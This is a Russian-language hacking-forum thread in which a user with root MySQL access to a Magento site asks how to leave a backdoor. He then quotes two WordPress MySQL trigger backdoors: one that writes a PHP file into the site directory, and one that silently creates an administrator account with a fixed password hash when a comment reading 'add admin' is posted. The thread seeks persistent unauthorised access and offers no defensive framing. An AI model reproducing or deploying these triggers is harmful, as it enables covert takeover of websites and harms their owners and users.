HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.02.2017, 19:26
PoliGroS
Guest
Сообщений: n/a
Провел на форуме:
14367

Репутация: 0
По умолчанию

Есть сайт магенто, в директории очень много файлов закритих, можно даже сказать что все. Ну не суть. Есть пароль к mysql рутовский, как оставить бекдор? Большое спасибо за ответы.
 
Ответить с цитированием

  #2  
Старый 05.02.2017, 20:03
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

 
Ответить с цитированием

  #3  
Старый 05.02.2017, 21:17
PoliGroS
Guest
Сообщений: n/a
Провел на форуме:
14367

Репутация: 0
По умолчанию

Вот под wp ничего не получается у людей, хз что по магенто. ну попробую скажу.

Цитата:
Сообщение от None  
DELIMITER //
CREATE TRIGGER backdoor AFTER UPDATE ON wp_users
FOR EACH ROW label:BEGIN
IF (SELECT user_pass FROM wp_users WHERE ID=1)=’$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’ THEN
SELECT » INTO OUTFILE ‘site/smile.php’;
ELSE
LEAVE label;
END IF;
END;
//
DELIMITER ;
я бы подумал что руки кривые, но и у ребят с форума тоже нечего не получилось
DELIMITER //
CREATE TRIGGER `INSERT` BEFORE INSERT ON `wp_comments`
FOR EACH ROW BEGIN
IF NEW.comment_content = ‘add admin’ THEN
INSERT INTO `wp_users` ( `ID` , `user_login` , `user_pass` ) VALUES
(‘31337’, ‘root’, ‘$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’);
INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES
(‘31337’, ‘wp_capabilities’, ‘a:1:{s:13:»administrator»;s:1:»1″;}’),
(‘31337’, ‘admin_color’, ‘fresh’),
(‘31337’, ‘comment_shortcuts’, ‘false’),
(‘31337’, ‘rich_editing’, ‘true’),
(‘31337’, ‘nickname’, ‘root’),
(‘31337’, ‘first_name’, ‘
drtro.public@gmail.com
’),
(‘31337’, ‘wp_user_level’, ’10’);
END IF;
END
//
DELIMITER ;
hnnps://xakep.ru/2011/11/22/57856/ - вот тут уже поинтересней.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ